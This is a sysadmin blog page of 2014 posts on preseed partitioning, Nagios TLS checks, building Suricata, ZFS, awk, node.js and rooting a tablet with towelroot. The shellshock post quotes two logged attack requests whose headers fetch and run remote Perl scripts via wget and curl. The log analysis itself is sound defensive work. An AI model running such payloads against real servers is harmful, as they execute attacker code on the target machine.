Header RSS Feed
 
If you only want to see the articles of a certain category, please click on the desired category below:
ALL Android Backup BSD Database Hacks Hardware Internet Linux Mail MySQL Nagios/Monitoring Network Personal PHP Proxy Shell Solaris Unix Virtualization VMware Windows Wyse

Using preseed to create two volume groups on same disk
Wednesday - Oct 22nd 2014 - by - (0 comments)

The following preseed partman recipe allows to create two volume groups on the same logical disk (/dev/sda):

d-i partman-auto/disk string /dev/sda
d-i partman-auto/method string lvm
d-i partman-auto/choose_recipe select mypartitioning

d-i partman-auto/expert_recipe string \
      mypartitioning :: \
              512 512 512 ext2                                \
                      $primary{ }                             \
                      $bootable{ }                            \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext2 }    \
                      label{ boot }                           \
                      mountpoint{ /boot }                     \
              . \
              122880 122880 122880 ext4                       \
                      $primary{ }                             \
                      method{ lvm }                           \
                      device{ /dev/sda2 }                     \
                      vg_name{ vg1 }                          \
              . \
              122880 1000000000 1000000000 ext4               \
                      $primary{ }                             \
                      method{ lvm }                           \
                      device{ /dev/sda3 }                     \
                      vg_name{ vg2 }                          \
              . \
              8192 8192 8192 linux-swap                       \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ swap }                         \
                      method{ swap } format{ }                \
              . \
              10240 10240 10240 ext4                          \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ root }                         \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext4 }    \
                      label{ root }                           \
                      mountpoint{ / }                         \
              . \
              8192 8192 8192 ext4                             \
                      $lvmok{ } in_vg{ vg1 }                  \
                      lv_name{ var }                          \
                      method{ format } format{ }              \
                      use_filesystem{ } filesystem{ ext4 }    \
                      label{ var }                            \
                      mountpoint{ /var }                      \
              .

This will create:

  • a primary partition with a size of ~500MB (the final OS defined it as 473MB) mounted on /boot
  • Another primary partition with a size of ~122GB (final OS: 114GB) used as PV for the volume group vg1
  • Another primary partition with a minimum size of ~122GB and max size of ... so big to use the whole disk .. for the volume group vg2
  • Create a swap partition with a size of 8GB as LV "swap" in the volume group vg1
  • Create a root (/) partition with a size of 10GB als LV "root" in the volume group vg1
  • Create a /var partition with a size of 8GB as LV "var" in the volume group vg1


 

Using Nagios check_smtp -S without SSLv3 (sslv3 alert handshake failure)
Tuesday - Oct 21st 2014 - by - (0 comments)

The recently discovered CVE-2014-3566 (nicknamed Poodle) has generally caused a lot of configuration effort in the whole Internet. After 18 years in service (SSLv3 was published 1996!), suddenly SSLv3 needed to be disabled everywhere.

While on the HTTP side most browsers have been using TLS for a long time, the story is different on the smtp protocol. A typical example is the Nagios plugins check_smtp which can be used with the parameter "-S" to check the mail server with STARTTLS.

After disabling SSLv3 on the remote mail server, Nagios went wild and reported an alert (CRITICAL - Cannot make SSL connection).
When running the plugin manually, more information is shown:

./check_smtp -H mailserver.example.com -S
CRITICAL - Cannot make SSL connection.
140449663530656:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:732:
CRITICAL - Cannot create SSL context.

Looks like check_smtp wants to use sslv3, no matter what (hence sslv3 alert handshake failure).

Before you think "Oh! My Nagios plugins are old. That must be it!". BUZZ! Nope, it doesn't matter if you are using nagios-plugins 1.4.16 or the newest 2.0.3 (believe me, I've tried both).
The reason for this is the openssl command, which is used in the background by check_smtp:

openssl s_client -connect mailserver.example.com:25 -starttls smtp
CONNECTED(00000003)
139976003229344:error:14077410:SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure:s23_clnt.c:732:

The error looks familiar, doesn't it? So let's check out the openssl version:

openssl version
OpenSSL 1.0.1 14 Mar 2012

Ugh. That's quite old, given all the openssl hickups in the past year. Let's check out the OS:

cat /etc/issue.net
Ubuntu 12.04.5 LTS

OK. To be honest: I expected a more recent version on an Ubuntu LTS - although it's not the newest LTS.

Let's compare this to a Debian Wheezy.

cat /etc/issue.net
Debian GNU/Linux 7

openssl version
OpenSSL 1.0.1e 11 Feb 2013

That looks newer. Wow, Debian is newer! (insider joke :) )

Let's do the same tests as before:

./check_smtp --help
check_smtp v1.4.16 (nagios-plugins 1.4.16)

./check_smtp -H mailserver.example.com -S
SMTP OK - 0.360 sec. response time|time=0.359723s;;;0.000000

Here it works. Simply because openssl is able to connect to the remote mailserver without using sslv3:

openssl s_client -connect mailserver.example.com:25 -starttls smtp
CONNECTED(00000003)
depth=1 C = US, O = "GeoTrust, Inc.", CN = RapidSSL CA
verify error:num=20:unable to get local issuer certificate
verify return:0
---
Certificate chain
 0 s:/serialNumber=XXXXXXXXXXXX/OU=GT12345678/OU=See www.rapidssl.com/resources/cps (c)14/OU=Domain Control Validated - RapidSSL(R)/CN=mailserver.example.com
   i:/C=US/O=GeoTrust, Inc./CN=RapidSSL CA
 1 s:/C=US/O=GeoTrust, Inc./CN=RapidSSL CA
   i:/C=US/O=GeoTrust Inc./CN=GeoTrust Global CA
---
Server certificate
-----BEGIN CERTIFICATE-----
[...]

So before you blame your monitoring plugins, make sure your openssl version is able to handle TLS.

 

Network Intrusion Detection System with Suricata on Debian Wheezy
Wednesday - Oct 8th 2014 - by - (0 comments)

Suricata is a network intrustion detection system (NIDS) which has a goal to become the "next snort", the de facto standard of NIDS. Both Suricata and Snort are running on rules which are both compatible with each other.

On Debian Wheezy there's the following package available in the repository:

root@debian-wheezy:~# apt-cache show suricata
Package: suricata
Version: 1.2.1-2
Installed-Size: 3809
Maintainer: Pierre Chifflier
Architecture: amd64
Depends: libc6 (>= 2.4), libcap-ng0, libgcrypt11 (>= 1.4.5), libgnutls26 (>= 2.12.17-0), libhtp1 (>= 0.2.6), libmagic1, libnet1 (>= 1.1.2.1), libnetfilter-queue1 (>= 0.0.15), libnfnetlink0 (>= 1.0.0), libpcap0.8 (>= 1.0.0), libpcre3 (>= 8.10), libprelude2, libyaml-0-2
Recommends: oinkmaster, snort-rules-default
Description-en: Next Generation Intrusion Detection and Prevention Tool
 Suricata is a network Intrusion Detection System (IDS). It is based on
 rules (and is fully compatible with snort rules) to detect a variety of
 attacks / probes by searching packet content.

However there are two big downsides with this package:

1) It is old. In the Wheezy repo Suricata is at version 1.2.1 while the sources of 2.4 have been released in September.
2) It doesn't work. I don't know if I did something wrong, but I installed the package on two newly installed virtual machines and nothing was ever logged. Not even local attacks simulated with nikto.

When I installed Suricata with the latest source package, it immediately started to work. That's why this article is about running Suricata from source.

1) Install pre-requirements
The following packages are enought to compile Suricata on a minimal Debian Wheezy.

apt-get install build-essential pkg-config libpcre3 libpcre3-dbg libpcre3-dev libyaml-0-2 libyaml-dev \
autoconf automake libtool libpcap-dev libnet1-dev zlib1g zlib1g-dev libmagic-dev libcap-ng-dev \
libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0

2) Download and unpack
Download the newest release (at the time of this writing this was 2.0.4) and unpack it.

cd /root/src; wget http://www.openinfosecfoundation.org/download/suricata-2.0.4.tar.gz
tar -xzf suricata-2.0.4.tar.gz; cd suricata-2.0.4

3) Compile
A little side node for the compile step: If you want to use Suricata as both IDS (Intrusion Detection System) AND IPS (Intrusion Prevention System), you must use "--enable-nfqueue" as configure option. You can also just compile with this option, just to be IPS-ready. The final switch has to be done in the configuration file anyway.
With the following configure line, the program will use the following folders:

/usr/bin: For the executable binary (/usr/bin/suricata)
/etc/suricata: Config files (most importantly suricata.yaml)
/etc/suricata/rules: Rule files
/var/log/suricata: Log files
/var/run/suricata: pid file

./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var

The output at the end is the following:

Generic build parameters:
  Installation prefix (--prefix):          /usr
  Configuration directory (--sysconfdir):  /etc/suricata/
  Log directory (--localstatedir) :        /var/log/suricata/

  Host:                                    x86_64-unknown-linux-gnu
  GCC binary:                              gcc
  GCC Protect enabled:                     no
  GCC march native enabled:                yes
  GCC Profile enabled:                     no

To build and install run 'make' and 'make install'.

You can run 'make install-conf' if you want to install initial configuration
files to /etc/suricata/. Running 'make install-full' will install configuration
and rules and provide you a ready-to-run suricata.

To install Suricata into /usr/bin/suricata, have the config in
/etc/suricata and use /var/log/suricata as log dir, use:
./configure --prefix=/usr/ --sysconfdir=/etc/ --localstatedir=/var/

Then run make followed by make install-full, which downloads additional emerging rules right into /etc/suricata/rules (thanks!):

make
make install-full

/usr/bin/wget -qO - http://rules.emergingthreats.net/open/suricata-2.0/emerging.rules.tar.gz | tar -x -z -C "/etc/suricata/" -f -

You can now start suricata by running as root something like '/usr/bin/suricata -c /etc/suricata//suricata.yaml -i eth0'.

If a library like libhtp.so is not found, you can run suricata with:
'LD_LIBRARY_PATH=/usr/lib /usr/bin/suricata -c /etc/suricata//suricata.yaml -i eth0'.

While rules are installed now, it's highly recommended to use a rule manager for maintaining rules.
The two most common are Oinkmaster and Pulledpork. For a guide see:
https://redmine.openinfosecfoundation.org/projects/suricata/wiki/Rule_Management_with_Oinkmaster

4) Adapt the configuration
The configuration file is, as mentioned above, /etc/suricata/suricata.yaml. This format is in yaml (yet another markup language) but just edit the file with your favorite editor (mine is vim).
I suggest you go from top to bottom of the config file to learn as much as possible and to set the configuration to your environments, but the following points are the settings I changed. Note that I didn't activate IPS with these config changes.

Disable console logging and log to file instead:

  # Define your logging outputs.  If none are defined, or they are all
  # disabled you will get the default - console output.
  outputs:
  - console:
      enabled: no
  - file:
      enabled: yes
      filename: /var/log/suricata/suricata.log

Define your HOME_NET (which is the private LAN where your machines is connected to):

  # Holds the address group vars that would be passed in a Signature.
  # These would be retrieved during the Signature address parsing stage.
  address-groups:

    HOME_NET: "[192.168.112.0/24]"

Adapt the host-os-policy and set your machine's IP address next to the policy (yes, Debian is a Linux distro, duh!):

# Host specific policies for defragmentation and TCP stream
# reassembly.  The host OS lookup is done using a radix tree, just
# like a routing table so the most specific entry matches.
host-os-policy:
  # Make the default policy windows.
  windows: []
  bsd: []
  bsd-right: []
  old-linux: []
  linux: [192.168.112.136]
  old-solaris: []
  solaris: []
  hpux10: []
  hpux11: []
  irix: []
  macos: []
  vista: []
  windows2k3: []

Set the paths to classification and reference-config-file correct (they should now be in the rules folder):

classification-file: /etc/suricata/rules/classification.config
reference-config-file: /etc/suricata/rules/reference.config

5) Start Suricata
Now let's start Suricata in daemon mode (-D) and see what happens... (that's exciting!)

suricata -c /etc/suricata/suricata.yaml -i eth0 -D

Suricata immediately starts to write log files into /var/log/suricata:

ls -ltr
total 360
drwxr-xr-x 2 root root   4096 Oct  8 21:49 files
drwxr-xr-x 2 root root   4096 Oct  8 21:49 certs
-rw-r----- 1 root root      0 Oct  8 21:52 http.log
-rw-r--r-- 1 root root    545 Oct  8 21:52 suricata.log
-rw-r--r-- 1 root root   3998 Oct  8 21:52 stats.log
-rw-r----- 1 root root 233626 Oct  8 21:52 unified2.alert.1412797965
-rw-r----- 1 root root 111321 Oct  8 21:52 fast.log

These logs are very important and can be simply explained:

http.log: Logs traffic/attacks to a local web server
suricata.log: The program's log file (which we have defined in the configuration file)
stats.log: Continued logging of statistics
unified2.alert.TIMESTAMP: The alerts are logged into this file in barnyard2 (by2) format
fast.log: Clear text logging of alerts

Now the unified2.alert log file is very interesting. In combination with barnyard2 (https://github.com/firnsy/barnyard2) the alerts can be read and stored into an external place, for example syslog or into a data base. I might follow up on this with a dedicated article...

6) Test an attack
I mentioned "nikto" above, which can be used to test-attack a web server. Let's do this and see how Suricata reacts:

root@attacker:~/nikto-master/program# ./nikto.pl -h 192.168.112.136 -C all

Holy sh!t... I only post the last few lines of the output:

tail /var/log/suricata/http.log
10/08/2014-22:29:20.464061 192.168.112.136 [**] /solr/admin/ [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006808) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.466145 192.168.112.136 [**] /html/vergessen.html [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006809) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.468097 192.168.112.136 [**] /typo3/install/index.php [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006810) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.470129 192.168.112.136 [**] /dnnLogin.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006811) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.474056 192.168.112.136 [**] /dnn/Login.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006812) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.476151 192.168.112.136 [**] /tabid/400999900/ctl/Login/portalid/699996/Default.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006813) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.478121 192.168.112.136 [**] /Portals/_default/Cache/ReadMe.txt [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006814) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.480445 192.168.112.136 [**] /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006816) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.483119 192.168.112.136 [**] /typo3_src/ChangeLog [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006817) [**] 192.168.112.133:41243 -> 192.168.112.136:80
10/08/2014-22:29:20.487481 192.168.112.136 [**] /_about [**] Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:006818) [**] 192.168.112.133:41243 -> 192.168.112.136:80

In total Suricata discovered and logged more than 20'000 attacks:

cat /var/log/suricata/http.log  | grep -c Nikto
22475

In the fast.log much less entries are logged:

tail /var/log/suricata/fast.log
10/08/2014-22:28:28.744886  [**] [1:2221028:1] SURICATA HTTP Host header invalid [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.112.133:40924 -> 192.168.112.136:80
10/08/2014-22:28:45.976806  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41028 -> 192.168.112.136:80
10/08/2014-22:29:07.430596  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.432698  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.435637  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:07.438709  [**] [1:2016184:5] ET WEB_SERVER ColdFusion administrator access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.112.133:41123 -> 192.168.112.136:80
10/08/2014-22:29:11.417867  [**] [1:2200003:1] SURICATA IPv4 truncated packet [**] [Classification: (null)] [Priority: 3] [**] [Raw pkt: 00 0C 29 CF F6 6D 00 0C 29 3D 0D 45 08 00 45 00 0B 84 8B 5D 40 00 40 06 41 B8 C0 A8 70 85 C0 A8 ]
10/08/2014-22:29:12.076980  [**] [1:2200003:1] SURICATA IPv4 truncated packet [**] [Classification: (null)] [Priority: 3] [**] [Raw pkt: 00 0C 29 3D 0D 45 00 0C 29 CF F6 6D 08 00 45 00 11 2C CE AB 40 00 40 06 F8 C1 C0 A8 70 88 C0 A8 ]
10/08/2014-22:29:19.187059  [**] [1:2221007:1] SURICATA HTTP invalid content length field in request [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.112.133:41235 -> 192.168.112.136:80

So this is how you get a new Suricata version installed quickly and painlessly on a Debian Wheezy. Enjoy.

 

ZFS is still resilvering when 100% done
Tuesday - Oct 7th 2014 - by - (0 comments)

On a Solaris 10 server I needed to replace a disk in a ZFS pool by using a spare drive:

zpool replace mypool c4t69d0 c5t65d0

ZFS then began to resilver the drive:

zpool status                          
  pool: mypool
 state: ONLINE
status: One or more devices is currently being resilvered.  The pool will
        continue to function, possibly in a degraded state.
action: Wait for the resilver to complete.
 scrub: resilver in progress for 0h0m, 0.00% done, 199h10m to go
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  16.6M resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

After almost 11 hours, the scrub line mentioned 100% done, but the status was still resilvering:

 zpool status
  pool: mypool
 state: ONLINE
status: One or more devices is currently being resilvered.  The pool will
        continue to function, possibly in a degraded state.
action: Wait for the resilver to complete.
 scrub: resilver in progress for 10h45m, 100.00% done, 0h0m to go
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  480G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

Is the status line wrong? Can I ignore it? Or is the 100% a false information? I came across this post in the FreeNAS.org forums where in general the OP was asked to be patient and... just wait. So that's what I did, too. And indeed, a few hours later the resilvering finished:

zpool status
  pool: mypool
 state: ONLINE
 scrub: resilver completed after 12h21m with 0 errors on Mon Oct  6 20:51:46 2014
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            spare      ONLINE       0     0     0
              c4t69d0  ONLINE       0     0     0
              c5t65d0  ONLINE       0     0     0  486G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t65d0      INUSE     currently in use
          c5t85d0      AVAIL  

Note that another 6GB were resilvered in between. So there is no technical way to solve this. It's just patience.

At the end I just needed to detach c4t69d0:

zpool detach mypool c4t69d0

zpool status
  pool: mypool
 state: ONLINE
 scrub: resilver completed after 12h21m with 0 errors on Mon Oct  6 20:51:46 2014
config:
        NAME           STATE     READ WRITE CKSUM
        mypool         ONLINE       0     0     0
          mirror       ONLINE       0     0     0
            c5t65d0    ONLINE       0     0     0  486G resilvered
            c4t66d0    ONLINE       0     0     0
        spares
          c5t85d0      AVAIL  

 

awk issue when trying to sort variables with same values
Monday - Sep 29th 2014 - by - (0 comments)

One month ago I wrote about a possibility how to "Use bash to compare remote cpu load and print lowest value of array".

Today I encountered an issue with exactly this command:

# for server in server01 server02 server03 server04; do
  case $server in
    server01) load[1]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server02) load[2]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server03) load[3]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
    server04) load[4]=$(ssh root@$server "cat /proc/loadavg | awk '{print \$3}'");;
  esac
done

# echo "${load[*]}" | tr ' ' '\n' | awk 'NR==1{min=$0}NR>1 && $1<min{min=$1;pos=NR}END{print pos}'

#

The returned position was not shown - just an empty line was returned.
Why's that? Let's take a look at all the values in the array "load":

# echo "${load[*]}"
0.05 0.05 0.05 0.05

So all array values have the exact same value. awk can't therefore define the lowest value.

The solution to this is to do a "lower or equal" comparison (note the "<="):

# echo "${load[*]}" | tr ' ' '\n' | awk 'NR==1{min=$0}NR>1 && $1<=min{min=$1;pos=NR}END{print pos}'
4

When all values are the same, awk will end up returning the position of the last found value.

 

Are there any shellshock attacks (in Apache access logs)?
Friday - Sep 26th 2014 - by - (1 comments)

Yes, shellshock is the nickname of the latest big vulnerability after the infamous SSL Heartbleed bug. But is it actually used? Do people attack?

I analyzed the access logs of ~1500 domains and I only found two hits:

109.95.210.196 - - [25/Sep/2014:19:48:24 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=example.com -O /tmp/a.pl\""

213.5.67.223 - - [25/Sep/2014:15:45:47 +0200] "GET /cgi-bin/his HTTP/1.0" 404 278 "-" "() { :;}; /bin/bash -c \"cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""

To be honest, I expected a flood of such requests. Instead I can live very well with just two of them.

 

node js: Fix bodyParser error (is no longer bundled with Express)
Tuesday - Sep 16th 2014 - by - (0 comments)

Let me begin with: I am no professional with node.js. Hell it's the first time I'm working on a node.js script. So you can imagine my eyebrows raising up when I saw that error when I tried to move an existing script to a newer platform:

nodejs /home/myscripts/callMe
Error: Most middleware (like bodyParser) is no longer bundled with Express and must be installed separately. Please see https://github.com/senchalabs/connect#middleware.
    at Function.Object.defineProperty.get (/home/myscripts/node_modules/express/lib/express.js:89:13)
    at Object. (/home/myscripts/lib/callMe/app.js:16:17)
    at Module._compile (module.js:456:26)
    at Object.Module._extensions..js (module.js:474:10)
    at Module.load (module.js:356:32)
    at Function.Module._load (module.js:312:12)
    at Module.require (module.js:364:17)
    at require (module.js:380:17)
    at Object. (/home/myscripts/sbin/callMe:2:1)
    at Module._compile (module.js:456:26)

The app.js contained the following definitions at the begin:

var app = express();
app.use(express.bodyParser());

According to this stackoverflow question, the "Express" module has removed the bodyParser function in newer versions. Instead of using this function as part of Express, it can now be used as its own module:

var app = express();
// Disabled because its not working anymore
//app.use(express.bodyParser());
// ... use body-parser package instead
var bodyParser = require('body-parser');
app.use(bodyParser());

Just needed to install the node.js module body-parser on the system:

npm install body-parser

And then the script was working again.

 

Sony Xperia Tablet Z with Kitkat: Fix for permission denied on sd card
Thursday - Sep 11th 2014 - by - (0 comments)

Since December 2013 I'm an owner of a Sony Xperia Z Tablet and until this week I never had to rant about it. Hell I have even decided to stay with the original Sony Android version and to not install Cyanogenmod, because Sony did a fine job and didn't f%ck up Android as much as other device vendors do. The number of Sony bloatware is limited and is not intrusive... but let's get back to my rant.

If you prefer, skip my rant and go straight to the solution.

I use my tablet for mainly two things:
- To be able to work remotely on my servers (see article Remote SSH work on Android tablet with ConnectBot and physical keyboard)
- To watch movies when I'm travelling long distances

Since the last device update to build number 10.5.A.0.230, admittedly a while ago, I cannot use my SD card anymore. I usually use the AndSMB app to transfer the movie I want to prepare for the travel directly from my NAS onto the SD card. It used to work flawlessly but when I copied two days ago, I got a "Permission denied" error in the AndSMB app. At first I suspected a bug in the AndSMB application because there was a recent update of the app, too. I also rebooted the tablet, just to make sure it's not a mounting issue of the AndSMB app. I tried the transfer again yesterday and the "Permission denied" was still there. So I got curious and opened "File Manager" app and tried to manually create a file on my SD card (which has worked before) and got an error "Operation Failed." which appeared for about 2 seconds at the bottom of the app.

At this point I realized, that with the update to build 10.5.A.0.230, I had also received the Android version 4.4, also known as KitKat. Now search for "Kitkat sd card" and you get thousands of websites cussing and swearing about Google having removed the write access to all apps (except their own!) to the (external) SD card. See this Google+ post by Tod Liebeck for a good summary of what exactly happened in KitKat. He sums it up so that every idiot can understand it:

"What this means is that with KitKat, applications will no longer be able create, modify, or remove files and folders on your external SD card."

Google, just what the hell were you thinking?! Yes ok, applications can no longer just create files in a chaotic and anarchic way. But what about users like me wanting to place large media files on the SD card. On purpose! What about applications running on the SD card? They stop working because they can no longer write to the folder they were installed/moved into. Additionally to this, there seems to have been no information at all about that change so users and application developers were left out in the dark and have to spend time in figuring out what the hell is going on and why such permission errors occur. Agreed, power users, not the usual oh-free-wifi-internet-hipster in Starbucks.

After a couple of minutes of research on this newly introduced limitation of Android (with a couple of swear words leaving my mouth), I was thinking of formatting the tablet completely and install CyanogenMod 11 on it. According to this Reddit post, CM seems to have removed the SD card write limitations. But before that I wanted to see if I could somehow fix it myself. After all I'm a Linux Sys Engineer and Android is running on Linux (somewhat but not exactly)... I installed the "Terminal Emulator" app and navigated to the SD card path:

u0_a44@SGP321: / $ cd /storage
u0_a44@SGP321: /storage $ ll
d---r-x---  root  sdcard_r     2014-09-11 09:00 emulated
lrwxrwxrwx  root  root         1971-01-05 19:16 sdcard0 -> /storage/emulated/legacy
drwxrwx--x  root  sdcard_r     2014-09-11 08:57 sdcard1

I tried to change the folder permissions of sdcard1 (which is the external SD card) to 777:

u0_a44@SGP321: /storage $ chmod 777 sdcard1

But that didn't work. The permissions stayed the same (Note: Even as root you cannot change that folder's permissions because of enabled SELinux).
Maybe it's just an issue with the FAT filesystem I thought and was then checking the Google Play store for an app to completely re-format the SD card to ext4 - but to my big surprise my search of "sd card" showed the app "SDFix: KitKat Writable MicroSD" by NextApp as one of the first results. Wow! That's exactly what I need!!! But the app's description mentions that root access is required. As I haven't rooted my tablet, I needed to find a way to root the device first. A quick research "root xperia z tablet" pointed me to quite a lot of results, some with large manuals, some to discussion threads in the xda forums. In the xda forums I saw the name "towelroot" appear very often. And that's where the solution for this whole SD card write permission issue starts.

The solution: How to fix your KitKat SD card write permission issue yourself

General information and disclaimer: You do this at your own risk. If you brick your device it's your own fault.
I did these steps successfully on a Xperia Z Tablet (model number SGP321) running on Android 4.4.2 and build 10.5.A.0.230 with Kernel version 3.4.0-perf-g32ce454.

1. Download towelroot application to root your device
On your tablet, open a browser and navigate to https://towelroot.com/. Click on the red sign to download the application package "tr.apk".

2. Install towelroot
On your tablet you will find the downloaded tr.apk in the "Downloads" folder. Launch a file explorer and click on tr.apk. Your system might tell you that the current settings do not allow to install apps from untrusted sources. In this case go to the Settings -> Security and under "Device Administration" click on "Unknown sources". Now you can install tr.apk:

Towelroot installation 

Funnily a warning appears, that Google does not recommend the installation of this package. Well Google, you left me no choice!

Towelroot installation warning 

3. Root the device
This sounds complicated but it is the easiest thing ever thanks to the towelroot application by geohot (yes, that's the guy who hacked the PlayStation!). Launch the towelroot application and click on the "make it ra1n" button.

towelroot root xperia z tablet  towelroot rooted xperia tablet z

If the rooting process was successful, the following text appears: "Thank you for using towelroot! You should have root, no reboot required.". 

Amazing. It worked. Becoming root in "Terminal Emulator" now works. 

root in Terminal Emulator

4. Install SDFix
Now that the tablet is rooted, you can install the SDFix application from Google Play.

SDFix app download SDFix App Download

Once installed, launch SDFix. The application itself is like an installer on Windows, just click yourself through.

SDFix Installation SDFix Installation SDFix Installation

After you see the green "Complete" page, you must reboot your tablet. Otherwise the applications still can't write into the SD.

5. Create file or folder with File Explorer in SDCard
To test both console and application permissions, I first created a folder "Movies" in /storage/sdcard1 in the "Terminal Emular" as root:

root@SGP321: / $ cd /storage/sdcard1
root@SGP321: /storage/sdcard1 $ mkdir Movies
root@SGP321: /storage/sdcard1 $ chmod 777 Movies
root@SGP321: /storage/sdcard1 $ ll
drwxrwx--x  root  sdcard_r      2014-09-10 20:14 Android
drwxrwx---  root  sdcard_r      2014-09-10 20:14 LOST.DIR
drwxrwx---  root  sdcard_r      2014-09-11 20:30 Movies
-rwxrwx---  root  sdcard_r      2014-09-11 20:07 customized-capability.xml
-rwxrwx---  root  sdcard_r      2014-09-11 20:07 default-capability.xml

And then created a folder within Movies in "File Explorer" app:

File Explorer Create Folder on SDCard Kitkat Successfully created folder on SD Card on Kitkat

That's it! Success! And I'm back to being a happy user again.

 

Rsnapshot does not remove LV snapshot when mount failed
Thursday - Sep 11th 2014 - by - (0 comments)

On a system running rsnapshot as local backup method, the rsnapshot process failed and the backup didn't run correctly.

After analyzing the logs, it appears that rsnapshot does not remove a logical volume snapshot if the snapshot could not be mounted successfully:

[10/Sep/2014:02:07:43] /sbin/lvcreate --snapshot --size 200M --name rsnapshot /dev/vgdata/mylv
[10/Sep/2014:02:07:44] /bin/mount /dev/vgdata/rsnapshot /mnt/lvm-snapshot
[10/Sep/2014:02:07:44] /usr/bin/rsnapshot -c /etc/rsnapshot.backup.conf daily: ERROR: Mount LVM snapshot failed: 8192
[10/Sep/2014:02:07:44] rm -f /var/run/rsnapshot.pid

Reason for the mount error was, that the defined mountpoint (/mnt/lvm-snapshot) did not exist. However, after the mount failed, the LV snapshot was not removed...

On the next run of,  the creation of the LV snapshot failed, because (obviously) it already existed (from the previous run):

[10/Sep/2014:09:30:08] /sbin/lvcreate --snapshot --size 200M --name rsnapshot /dev/vgdata/mylv
[10/Sep/2014:09:30:08] /usr/bin/rsnapshot -c /etc/rsnapshot.backup.conf daily: ERROR: Create LVM snapshot failed: 1280
[10/Sep/2014:09:30:08] rm -f /var/run/rsnapshot.pid

To solve this issue, the mountpoint must be created and the logical volume snapshot must be deleted manually. Afterwards, rsnapshot runs correctly again.

This seems to be a bug of rsnapshot, so I opened an issue in the github repository of rsnapshot.

 

Firefox displays: The image cannot be displayed because it contains errors
Monday - Sep 8th 2014 - by - (0 comments)

Recently I was contacted by a user that on his website his uploaded images cannot be seen. According to the user, this must of course be an issue on the server... (arr!)

When I manually loaded the picture, I was a little bit surprised by the error message shown by Firefox:

The image "http://example.com/logo.png" cannot be displayed because it contains errors.

The image cannot be displayed because it contains errors

By testing the same URL on Chrome, the "classical" image not found/image broken image appeared:

broken image in chrome

To proof that its not a server issue, I uploaded a png picture myself and opened the URL. Which worked fine, of course. 

By using the "Page Info" on Firefox, additional information was shown about the images. First the working one, uploaded by me:

Page Info working image 

And then the non-working image:

Info image not working

Very interesting here are the mentioned dimensions. So there's definitely something wrong.

I told the user that there must have been either a FTP transfer error or that the pictures were not properly created. At the end it turned out, that the user transferred the images in ASCII mode instead of BINARY mode...

Yes, it's always the server! :-)

 


Go to Homepage home
Linux Howtos how to's
Nagios Plugins nagios plugins
Links links

Valid HTML 4.01 Transitional
Valid CSS!
